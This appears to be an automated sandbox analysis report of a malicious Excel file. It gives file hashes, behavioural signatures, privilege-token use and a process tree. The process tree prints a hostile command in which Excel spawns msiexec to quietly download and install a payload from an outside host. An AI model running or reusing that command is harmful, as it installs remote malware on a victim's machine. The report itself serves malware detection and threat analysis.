Analysis
max time kernel: 22s
max time network: 17s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64 arch:x86 image:win7-20240704-en locale:en-us os:windows7-x64 system
submitted: 07-09-2024 21:19
Behavioral task: behavioral1
  Sample: b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2.xls
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2.xls
  Resource: win10v2004-20240802-en
General
Target: b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2.xls
Size: 82KB
MD5: 4343c63398743e8ac3d76e63f799f1b6
SHA1: 7cd562a9c1be7d4f39ae824e1caeed9a6d03b81a
SHA256: b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2
SHA512: 5af95beba0db5b5ea49fcaacb24013002afc51144a912fd8e250f522f8e371d278512e5740c7ca2ba3e7a16ef520b577bf01205a3435df378cfcbd9041f1348c
SSDEEP: 1536:0Kpb8rGYrMPelwhKmFV5xtezEsgrdgrebDG7XE8rMxLgb4JSt1mGJfFacueBkgVq:0Kpb8rGYrMPelwhKmFV5xtezEsgrdgwR
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 2924 | 2280 | msiexec.exe | EXCEL.EXE
Use of msiexec (install) with remote resource 1 IoCs
Processes:
pid | process
2924 | msiexec.exe
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
2280 | EXCEL.EXE
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
description | pid | process
Token: SeShutdownPrivilege | 2924 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2924 | msiexec.exe
Token: SeRestorePrivilege | 2768 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2768 | msiexec.exe
Token: SeSecurityPrivilege | 2768 | msiexec.exe
Token: SeCreateTokenPrivilege | 2924 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 2924 | msiexec.exe
Token: SeLockMemoryPrivilege | 2924 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2924 | msiexec.exe
Token: SeMachineAccountPrivilege | 2924 | msiexec.exe
Token: SeTcbPrivilege | 2924 | msiexec.exe
Token: SeSecurityPrivilege | 2924 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2924 | msiexec.exe
Token: SeLoadDriverPrivilege | 2924 | msiexec.exe
Token: SeSystemProfilePrivilege | 2924 | msiexec.exe
Token: SeSystemtimePrivilege | 2924 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 2924 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 2924 | msiexec.exe
Token: SeCreatePagefilePrivilege | 2924 | msiexec.exe
Token: SeCreatePermanentPrivilege | 2924 | msiexec.exe
Token: SeBackupPrivilege | 2924 | msiexec.exe
Token: SeRestorePrivilege | 2924 | msiexec.exe
Token: SeShutdownPrivilege | 2924 | msiexec.exe
Token: SeDebugPrivilege | 2924 | msiexec.exe
Token: SeAuditPrivilege | 2924 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 2924 | msiexec.exe
Token: SeChangeNotifyPrivilege | 2924 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 2924 | msiexec.exe
Token: SeUndockPrivilege | 2924 | msiexec.exe
Token: SeSyncAgentPrivilege | 2924 | msiexec.exe
Token: SeEnableDelegationPrivilege | 2924 | msiexec.exe
Token: SeManageVolumePrivilege | 2924 | msiexec.exe
Token: SeImpersonatePrivilege | 2924 | msiexec.exe
Token: SeCreateGlobalPrivilege | 2924 | msiexec.exe
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
pid | process
2280 | EXCEL.EXE
2280 | EXCEL.EXE
2280 | EXCEL.EXE
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
description | pid | process | target process
PID 2280 wrote to memory of 2924 | 2280 | EXCEL.EXE | msiexec.exe
PID 2280 wrote to memory of 2924 | 2280 | EXCEL.EXE | msiexec.exe
PID 2280 wrote to memory of 2924 | 2280 | EXCEL.EXE | msiexec.exe
PID 2280 wrote to memory of 2924 | 2280 | EXCEL.EXE | msiexec.exe
PID 2280 wrote to memory of 2924 | 2280 | EXCEL.EXE | msiexec.exe
PID 2280 wrote to memory of 2924 | 2280 | EXCEL.EXE | msiexec.exe
PID 2280 wrote to memory of 2924 | 2280 | EXCEL.EXE | msiexec.exe
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b30c397815473cb2ef4798991402a91e76e300635e0c69d4c049bdff15842ea2.xls
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 2280
  C:\Windows\SysWOW64\msiexec.exe (child of EXCEL.EXE, PID 2280)
    Command line: msiexec.exe RESTART=1 /i http://zonaykan.com/lsadat2 /q ADRESS=TEMP
    - Process spawned unexpected child process
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID: 2924
C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Suspicious use of AdjustPrivilegeToken
  PID: 2768